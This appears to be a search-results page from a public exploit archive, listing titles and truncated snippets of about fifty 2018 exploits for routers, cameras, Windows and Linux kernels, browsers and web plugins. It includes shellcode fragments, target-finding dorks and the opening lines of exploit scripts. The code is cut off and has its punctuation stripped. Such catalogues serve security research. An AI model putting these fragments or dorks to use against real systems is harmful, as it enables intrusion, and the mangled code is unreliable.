47904 matches found
WM Recorder 16.8.1 - Denial of Service
!/usr/bin/python Exploit Author: bzyo Twitter: @bzyo Exploit Title: WM Recorder 16.8.1 - Denial of Service Date: 03-20-2018 Vulnerable Software: WM Recorder 16.8.1 Vendor Homepage: http://wmrecorder.com/home/ Version: 16.8.1 Software Link: http://wmrecorder.com/download/wm-recorder/ Tested On:...
Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)
Linux/x86 - EggHunter + Null-Free Shellcode 11 Bytes. Shellcode exploit for Linuxx86 platform / Title: Linux/x86 - EggHunter Shellcode 11 Bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 11 Description: Smallest Null-Free Egg Hunter Shellcode - 11 Bytes Details: 1. Work...
Easy Avi Divx Xvid to DVD Burner 2.9.11 - '.avi' Denial of Service
!/usr/bin/python Exploit Title : Easy Avi Divx Xvid to DVD Burner v2.9.11 - Local Denial of Service Exploit Author : Hashim Jawad Twitter : @ihack4falafel Author Website : ihack4falafel.com Vendor Homepage : http://www.divxtodvd.net/index.htm Vulnerable Software:...
Android Bluetooth - BNEP bnep_data_ind() Remote Heap Disclosure
import os import sys import struct import bluetooth BNEPPSM = 15 BNEPFRAMECOMPRESSEDETHERNET = 0x02 LEAKATTEMPTS = 20 def leaksrcbdaddr, dst: bnep = bluetooth.BluetoothSocketbluetooth.L2CAP bnep.settimeout5 bnep.bindsrcbdaddr, 0 print 'Connecting to BNEP...' bnep.connectdst, BNEPPSM...
Dell EMC NetWorker - Denial of Service
''' Exploit Title: Dell EMC NetWorker DoS PoC Date: 18.03.2018 Exploit Author: Marek Cybul Vendor Homepage: https://www.emc.com/data-protection/networker.htm Versions: Dell EMC NetWorker versions prior to 9.2.1.1 Dell EMC NetWorker versions prior to 9.1.1.6 Dell EMC NetWorker 9.0.x Dell EMC...
Allok Quicktime to AVI MPEG DVD Converter 4.6.1217 - Stack-Based Buffer Overflow
SWAMI KARUPASAMI THUNAI Exploit Title: Allok Video Converter - Buffer Overflow Vulnerability Windows XP SP3 Date: 06-03-2018 Exploit Author: Mohan Ravichandran & Velayutham Selvaraj Organization : TwinTech Solutions Vulnerable Software: Allok Video Converter Vendor Homepage:...
MyBB Plugin Last User's Threads in Profile Plugin 1.2 - Persistent Cross-Site Scripting
Exploit Title: MyBB Last User's Threads in Profile Plugin v1.2 - Persistent XSS Date: 3/19/2018 Author: 0xB9 Contact: luxorforums.com/User-0xB9 or 0xB9atprotonmail.com Software Link: https://community.mybb.com/mods.php?action=view&pid=910 Version: v1.2 Tested on: Ubuntu 17.10 1. Description:...
TL-WR720N 150Mbps Wireless N Router - Cross-Site Request Forgery
/ Exploit Title: TL-WR720N 150Mbps Wireless N Router - CSRF Date: 21-3-2018 Exploit Author: Mans van Someren Vendor Homepage: https://www.tp-link.com/ Software Link: https://static.tp-link.com/resources/software/TL-WR720NV1130719.zip Version: All versions because its a 0day Testen on: Google Chro...
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion
Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/ Vendor: Site Editor Tested version: 1.1.1 CVE ID: CVE-2018-7422 CVE description A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitra...
Easy CD DVD Copy 1.3.24 - Local Buffer Overflow (SEH)
!/usr/bin/python Exploit Title : Easy CD DVD Copy v1.3.24 - Local Buffer Overflow SEH Exploit Author : Hashim Jawad Twitter : @ihack4falafel Author Website : ihack4falafel.com Vendor Homepage : http://www.divxtodvd.net/index.htm Vulnerable Software: http://www.divxtodvd.net/easycddvdcopy.exe Test...
Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass
Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 Builds: 140721 - 170109 Backdoor Date: 15-03-2018 Vendor Homepage: http://www.hikvision.com/en/ Exploit Author: Matamorphosis Category: Web Apps Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 Builds:...
Android Bluetooth - BNEP BNEP_SETUP_CONNECTION_REQUEST_MSG Out-of-Bounds Read
import os import sys import struct import bluetooth BNEPPSM = 15 BNEPFRAMECONTROL = 0x01 Control types parsed by bnepprocesscontrolpacket in bneputils.cc BNEPSETUPCONNECTIONREQUESTMSG = 0x01 def oobreadsrcbdaddr, dst: bnep = bluetooth.BluetoothSocketbluetooth.L2CAP bnep.settimeout5...
Crashmail 1.6 - Stack-Based Buffer Overflow (ROP)
Exploit author: Juan Sacco Website: http://exploitpack.com Description: Crashmail is prone to a stack-based buffer overflow because the application fails to perform adequate boundary checks on user supplied input. Impact: An attacker could exploit this vulnerability to execute arbitrary code in t...
XenForo 2 - CSS Loader Denial of Service
Exploit Title: XenForo CSS Loader DoS Google Dork: intext:"Forum software by XenForoâ„¢" inurl:css.php ext:php Date: 22-03-18 Exploit Author: LockedByte Vendor Homepage: https://xenforo.com/ Software Link: https://xenforo.com/help/installation/ Version: XenForo 2 Tested on: Linux...
Linux Kernel < 4.15.4 - 'show_floppy' KASLR Address Leak
include include include include include include include include include include static int driveselectorint head return head 2; void fdrecalibrateint fd struct floppyrawcmd rawcmd; int tmp; rawcmd.flags = FDRAWINTR; rawcmd.cmdcount = 2; // set up the command rawcmd.cmdrawcmd.cmdcount++ = 0x07;...
OpenSSH < 6.6 SFTP - Command Execution
OpenSSH 8 else 32 print "+ bit libc mapped @ -, path: ".formatBITS, addr0, addr1, path libcbase = intaddr0, 16 libcpath = path if "stack" in line: addr = addr.split"-" saddrstart = intaddr0, 16 saddrend = intaddr1, 16 print "+ Stack mapped @ -".formataddr0,...
Cisco node-jos < 0.11.0 - Re-sign Tokens
!/usr/bin/env python3 import base64 from urllib.parse import quoteplus import rsa import sys zi0Black ''' EDB Note: This has been updated https://github.com/offensive-security/exploitdb/pull/139 POC of CVE-2018-0114 Cisco node-jose = 8 return b::-1 def generateheaderpayloadpayload,pubkey: create...
Coship RT3052 Wireless Router - Persistent Cross-Site Scripting
Exploit Title: Coship RT3052 Wireless Router - Persistent Cross Site Scripting XSS Date: 2018-03-18 Exploit Author: Sayan Chatterjee Vendor Homepage: http://en.coship.com/ Category: Hardware Wifi Router Version: 4.0.0.48 Tested on: Windows 10 CVE: CVE-2018-8772 Proof of Concept =================...
Vehicle Sales Management System - Multiple Vulnerabilities
Exploit Title: VSMS Multiple Vulnerabilities Google Dork: N/A Date: 16-3-2018 Exploit Author: Sing Vendor Homepage: https://sourceforge.net/projects/vsms-php/?source=typredirect Software Link: https://sourceforge.net/projects/vsms-php/?source=typredirect Version: 07/2017 possible v1.2 Tested on:...
Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation
/ Google software updater ships with Chrome on MacOS and installs a root service com.google.Keystone.Daemon.UpdateEngine which lives here: /Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/GoogleSoftwareUpdateDaemon This service vends a Distributed Object which expos...
Microsoft Windows Kernel - 'NtQueryVirtualMemory(MemoryMappedFilenameInformation)' 64-bit Pool Memory Disclosure
/ We have discovered that the nt!NtQueryVirtualMemory system call invoked with the 2 information class MemoryMappedFilenameInformation discloses portions of uninitialized kernel pool memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 to 10. The output buffer for...
Microsoft Windows Kernel - 'nt!NtWaitForDebugEvent' 64-bit Stack Memory Disclosure
/ We have discovered that the nt!NtWaitForDebugEvent system call discloses portions of uninitialized kernel stack memory to user-mode clients, on 64-bit versions of Windows 7 to Windows 10. The output buffer, and the corresponding temporary stack-based buffer in the kernel are 0xB8 184 bytes in...
Intelbras Telefone IP TIP200 LITE - Local File Disclosure
Exploit Title: INTELBRAS TELEFONE IP TIP200/200 LITE Local File Include Google Dork: Date: 16/03/2018 Exploit Author: Matheus Goncalves - anhax0r Vendor Homepage: https://www.facebook.com/anhaxteam/ Software Link: Version: 60.0.75.29 REQUIRED Tested on: Debian CVE : if applicable Remember that yo...
Microsoft Windows - Desktop Bridge Virtual Registry Arbitrary File Read/Write Privilege Escalation
Windows: Windows: Desktop Bridge Virtual Registry Arbitrary File Read/Write EoP Platform: Windows 1709 not tested earlier version Class: Elevation of Privilege Summary: The handling of the virtual registry for desktop bridge applications can allow an application to create arbitrary files as syste...
Microsoft Windows Kernel - 'nt!KiDispatchException' 64-bit Stack Memory Disclosure
/ We have discovered a new Windows kernel memory disclosure vulnerability in the creation and copying of a EXCEPTIONRECORD structure to user-mode memory while passing execution to a user-mode exception handler. The vulnerability affects 64-bit versions of Windows 7 to 10. The leak was originally...
Microsoft Windows - Desktop Bridge VFS Privilege Escalation
Windows: Windows: Desktop Bridge VFS EoP Platform: Windows 1709 not tested earlier version Class: Elevation of Privilege Summary: The handling of the VFS for desktop bridge applications can allow an application to create virtual files in system folder which can result in EoP. Description: The...
Microsoft Windows Kernel - 'NtQueryInformationThread(ThreadBasicInformation)' 64-bit Stack Memory Disclosure
/ We have discovered that the nt!NtQueryInformationThread system call invoked with the 0 information class ThreadBasicInformation discloses portions of uninitialized kernel stack memory to user-mode clients. The vulnerability affects 64-bit versions of Windows 7 to 10. The specific layout of the...
Linux/x86 - execve(/bin/sh) Shellcode (18 bytes)
Linux/x86 - execve/bin/sh Shellcode 18 bytes. Shellcode exploit for Linuxx86 platform / Linux/x86 - execve /bin/sh shellcode 18 bytes Author: Anurag Srivastava Tested on: i686 GNU/Linux Shellcode Length: 18 Disassembly of section .text: 08048060 : 8048060: 6a 0b push 0xb 8048062: 58 pop eax...
Internet Explorer - 'RegExp.lastMatch' Memory Disclosure
/ There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure. This was tested on IE11 running on Window 7 64-bit with the latest patches applied. PoC: ========================================= / function main RegExp.input = toString: f; alertRegExp.lastMatc...
Microsoft Windows - Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write Privilege Escalation
Windows: Desktop Bridge Virtual Registry NtLoadKey Arbitrary File Read/Write EoP Platform: Windows 1703 version 1709 seems to have fixed this bug Class: Elevation of Privilege Summary: The handling of the virtual registry NtLoadKey callback reloads registry hives insecurely leading to arbitrary...
Kamailio 5.1.1 / 5.1.0 / 5.0.0 - Off-by-One Heap Overflow
''' Off-by-one heap overflow in Kamailio - Authors: - Alfred Farrugia - Sandro Gauci - Fixed versions: Kamailio v5.1.2, v5.0.6 and v4.4.7 - References: no CVE assigned yet - Enable Security Advisory: - Tested vulnerable versions: 5.1.1, 5.1.0, 5.0.0 - Timeline: - Report date: 2018-02-10 - Kamaili...
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation
/ Ubuntu 16.04.4 kernel priv esc all credits to @bleidl - vnik / // Tested on: // 4.4.0-116-generic 140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x8664 // if different kernel adjust CRED offset + check kernel stack size include include include include include include include include include include...
Unitrends UEB 10.0 - Root Remote Code Execution
Exploit Title: Unauthenticated root RCE for Unitrends UEB 10.0 Date: 10/17/2017 Exploit Authors: Cale Smith, Benny Husted, Jared Arave Contact: https://twitter.com/iotennui || https://twitter.com/BennyHusted || https://twitter.com/0xC413 Vendor Homepage: https://www.unitrends.com/ Software Link:...
Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution
46.0.1 -- CVE-2016-1960 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x20200000 / target address of asm.js float pool payload/...
Firefox 46.0.1 - ASM.JS JIT-Spray Remote Code Execution
CVE-2016-2819 and ASM.JS JIT-Spray "use strict" var Exploit = function this.asmjs = new Asmjs this.heap = new Heap Exploit.prototype.go = function / target address of fake node object / var nodetargetaddr = 0x5a500000 / target address of asm.js float pool payload/ var targeteip = 0x20200b58 / spr...
Contec Smart Home 4.15 - Unauthorized Password Reset
Title : Contec smart home 4.15 Unauthorized Password Reset Shodan Dork : "content/smarthome.php" Vendor Homepage : http://contec.co.il Tested on : Google Chrome Tested version : 4.15 Date : 2018-03-14 Author : Z3ro0ne Contact : [email protected] Facebook Page : https://www.facebook.com/Z3ro0...
Microsoft Windows Kernel (7 x86) - Local Privilege Escalation (MS17-017)
include include include include pragma commentlib, "psapi.lib" define POCDEBUG 0 if POCDEBUG == 1 define POCDEBUGBREAK getchar elif POCDEBUG == 2 define POCDEBUGBREAK DebugBreak else define POCDEBUGBREAK endif CONST LONG maxTimes = 2000; CONST LONG tmpTimes = 3000; static HBITMAP hbitmapmaxTimes ...
Android DRM Services - Buffer Overflow
include include include include include include include include include include using namespace android; static sp getCrypto sp sm = defaultServiceManager; sp binder = sm-getServiceString16"media.drm"; sp service = interfacecastbinder; if service == NULL fprintfstderr, "Failed to retrieve...
MikroTik RouterOS < 6.41.3/6.42rc27 - SMB Buffer Overflow
!/usr/bin/env python import socket import struct import sys import telnetlib NETBIOSSESSIONMESSAGE = "\x00" NETBIOSSESSIONREQUEST = "\x81" NETBIOSSESSIONFLAGS = "\x00" trick from http://shell-storm.org/shellcode/files/shellcode-881.php will place the socket file descriptor in eax findsockfd =...
Spring Data REST < 2.6.9 (Ingalls SR9) / 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution
// Exploit Title: RCE in PATCH requests in Spring Data REST // Date: 2018-03-10 // Exploit Author: Antonio Francesco Sardella // Vendor Homepage: https://pivotal.io/ // Software Link: https://projects.spring.io/spring-data-rest/ // Version: Spring Data REST versions prior to 2.6.9 Ingalls SR9,...
WordPress Plugin Duplicator 1.2.32 - Cross-Site Scripting
Exploit Title : Duplicator Wordpress Migration Plugin Reflected Cross Site Scripting XSS Date: 25-02-2018 Exploit Author : Stefan Broeder Contact : https://twitter.com/stefanbroeder Vendor Homepage: https://snapcreek.com/ Software Link: https://wordpress.org/plugins/duplicator/ Version: 1.2.32 CV...
SAP NetWeaver AS JAVA CRM - Log injection Remote Command Execution
!/usr/bin/env python import argparse import urllib import requests, random from bs4 import BeautifulSoup from requests.packages.urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disablewarningsInsecureRequestWarning helpdesc = ''' PoC of Remote Command Execution via Log...
Tuleap 9.17.99.189 - Blind SQL Injection
=============================================================================== title: Tuleap SQL Injection case id: CM-2018-01 product: Tuleap version 9.17.99.189 vulnerability type: Blind SQL injection - time based severity: High found: 2018-02-24 by: Cristiano Maruti @cmaruti...
SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Multiple Critical Vulnerabilities product: SecurEnvoy SecurMail vulnerable version: 9.1.501 fixed version: 9.2.501 or hotfix patch "1012018" CVE number: CVE-2018-7701,...
ManageEngine Applications Manager 13.5 - Remote Code Execution (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "ManageEngine Applications Manager Remote Code Execution", 'Description' = %q This module exploits command injection vulnerability in the...
MikroTik RouterOS < 6.38.4 (x86) - 'Chimay Red' Stack Clash Remote Code Execution
!/usr/bin/env python2 Mikrotik Chimay Red Stack Clash Exploit by wsxarcher based on BigNerd95 POC tested on RouterOS 6.38.4 x86 ASLR enabled on libs only DEP enabled import socket, time, sys, struct from pwn import import ropgadget ASTSTACKSIZE = 0x800000 default stack size per thread 8 MB...
ACL Analytics 11.X - 13.0.0.579 - Arbitrary Code Execution
Exploit Title: Arbitrary Code Execution Google Dork: N/A Date: 03-07-2018 Exploit Author: Clutchisback1 Vendor Homepage: https://www.acl.com Software Link: https://www.acl.com/products/acl-analytics/ Version: 11.x - 13.0.0.579 Tested on: Windows 7 pro SP1 x86 Clutchisback1 ///\ I'll get OSCP one...
MikroTik RouterOS < 6.38.4 (MIPSBE) - 'Chimay Red' Stack Clash Remote Code Execution
!/usr/bin/env python3 Mikrotik Chimay Red Stack Clash Exploit by BigNerd95 Tested on RouterOS 6.38.4 mipsbe using a CRS109 Used tools: pwndbg, rasm2, mipsrop for IDA I used ropper only to automatically find gadgets ASLR enabled on libs only DEP NOT enabled import socket, time, sys, struct, re fro...
Prisma Industriale Checkweigher PrismaWEB 1.21 - Hard-Coded Credentials
Prisma Industriale Checkweigher PrismaWEB 1.21 Authentication Bypass Vendor: Prisma Industriale S.r.l. Product web page: https://www.prismaindustriale.com Affected version: 1.0 Rev 21, EPROM 202FWSAM ?? Summary: Web Administration of Machine. Desc: The vulnerability exists due to the disclosure o...
DEWESoft X3 SP1 (x64) - Remote Command Execution
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/DEWESOFT-X3-REMOTE-INTERNAL-COMMAND-ACCESS.txt + ISR: Apparition Security Vendor: ============= www.dewesoft.com Product: =========== DEWESoft X3 SP1 64-bit installer - X3...